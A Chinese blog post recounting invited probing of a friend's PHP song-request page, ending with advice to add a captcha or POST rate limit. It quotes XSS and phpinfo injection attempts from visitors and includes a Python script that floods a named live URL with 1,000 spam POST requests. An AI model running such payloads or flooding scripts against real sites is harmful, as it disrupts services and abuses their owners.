• 关于post利用之Python


    今天大师兄放出了自己用PHP写的KTV点歌系统,注明,欢迎调戏,于是乎就尝试了下。

    地址就不上了,到现在没补漏洞,我可不想被大师兄K……

    首先试试JavaScript脚本能否恶搞下

    来个最基础的警告框吧!

    <script type="text/javascript">
    alert("我是黑客!!")
    </script>

    突然跳出

    写这么长,作死么?小屌丝已存在!

    无语的节奏

    翻一番前人留下的痕迹

    哔a_href_=_"#"哔我试试好用不哔/a哔
    哔哔哔哔哔哔

    哔php?_?哔
    <php?_?>
    中二的少年
    九妹
    我试点一下看看
    王妃
    sss
    哔h1哔有人植入乱码哔/h1哔
    小白杨
    ????
    哔?phpinfo();?哔
    <?phpinfo();?>
    <php?phpinfo();?>
    呵呵
    哔h2哔sb荣哔/h2哔
    <?phpinfo();while(1);?>

    似乎进行了空格等敏感字符的过滤

    看样子此路不通了---仔细思考下  嗯?没有验证码,啊哈,可以利用POST进行洪水攻击,然后刷爆页面。因为他是把数据库中的所有记录都输出在当前一个界面。所以完全可以让垃圾信息充斥。

    <meta charset="gbk">
    <p><h1> 王老菊点歌系统--记录下最想去ktv点的歌,方便日后点唱 </h1>
    <font color="#f00">--嘛,取个这么作死的名字真的大丈夫?不管了,随你们调戏吧</font>
    </p>
    新不了情<br>kk->杀马特与王师傅<br>烟花易冷<br>~@天舞繁星(44638907*)__0:42:56_撸多了出幻觉<br>喀秋莎<br>新贵妃醉酒<br>洛天依<br>最美的单相思<br>提灯照河山<br>三少爷的剑<br>air-缘<br>ForbiddenAct<br>风居住的街道<br>临安初雨<br>潇洒走一回<br><<br>花与风的赞美诗<br>32<br>65456456<br>新不了情_kk->杀马特与王师傅_烟花易冷_~@天舞繁星(44638907*)__0:42:56_撸多了出幻觉_喀秋莎_新贵妃醉酒_洛天依_最美的单相思_提灯照河山_三少爷的剑_air-缘_ForbiddenAct_风居住的街道_临安初雨_潇洒走一回_<_花与风的赞美诗_32_65456456<br>蜀绣<br><script>document.write("<h1>hack_by_intptr<b><-左边作死@_@</b></h1>");</script><br><a_href_=_"#">我试试好用不</a><br>哔a_href_=_"#"哔我试试好用不哔/a哔<br>哔哔哔哔哔哔<br><br>哔php?_?哔<br>&lt;php?_?&gt;<br>中二的少年<br>九妹<br>我试点一下看看<br>王妃<br>sss<br>哔h1哔有人植入乱码哔/h1哔<br>小白杨<br>????<br>哔?phpinfo();?哔<br>&lt;?phpinfo();?&gt;<br>&lt;php?phpinfo();?&gt;<br>呵呵<br>哔h2哔sb荣哔/h2哔<br>&lt;?phpinfo();while(1);?&gt;<br><br>白色相簿<br>男人海洋<br>大海<br>dd<br>最天使<br>HackScripTest<br>DDos_it_by_CRoot<br>111111111<br>Attack_Start_By_CRoot<br>The_Attack_1_times<br>The_Attack_2_times<br>The_Attack_3_times<br>The_Attack_4_times<br>The_Attack_5_times<br><!--此处省去我用脚本刷出的N条信息-->
    报告队长,调戏完毕!<br>调戏完了,留下一个歌<br>离歌-信乐团<br>有空加个验证码,亲<br><br><p><b>写这么长,作死么?小屌丝</b>已存在!</p>
    <hr>
    <form action="songs.php" method="post">
    Input the song to add:<input type="text" name="newsong" />
    <input type="submit" value="send"/>
    </form>

    看到这,不禁兴奋不已。于是脚本出炉。

    #!/usr/bin/python
    #===========================================
    # Project name: DDosWysaid                
    # Description: NULL
    # Author: CRoot                            
    #===========================================
    import urllib,urllib2
    
    running = True 
    i = 1
    number = 1000 # Attack number of times
    url = 'http://kktv.wysaid.org/songs.php' # Attack the address
    print 'The attack began!'
    while running:
        String = 'The Attack '+str(i)+' times'
        parameters = {'newsong' : String}
        s='The Attack ' + str(i) + 'th times'
        print s
        data = urllib.urlencode(parameters)    # Use urllib to encode the parameters
        request = urllib2.Request(url, data)
        response = urllib2.urlopen(request)    # This request is sent in HTTP POST
        page = response.read(200000)
        if i == number:
            running = False
        else:
            i = i + 1
    print 'Attack to complete!'
        
        
        

    先这样吧,就调戏到这里。最后希望大师兄加个验证码或者POST次数限制啥的。否则会被严重爆菊的!!

  • 相关阅读:
    120所国家重点建设大学(211工程和教育部直属)[国家一类本科大学]详细情况一览表
    VC画线几个常见方法
    中国地学35个国家重点实验室分布一览
    可执行文件加入Linux默认路径的办法
    SVN 常用命令 客户端
    ls(list) linux 功能说明
    Vim
    Linux添加FTP用户并设置权限
    tar [cxtzjvfpPN] 文件与目录
    linux etc/passwd 有关
  • 原文地址:https://www.cnblogs.com/croot/p/3462735.html
Copyright © 2020-2023  润新知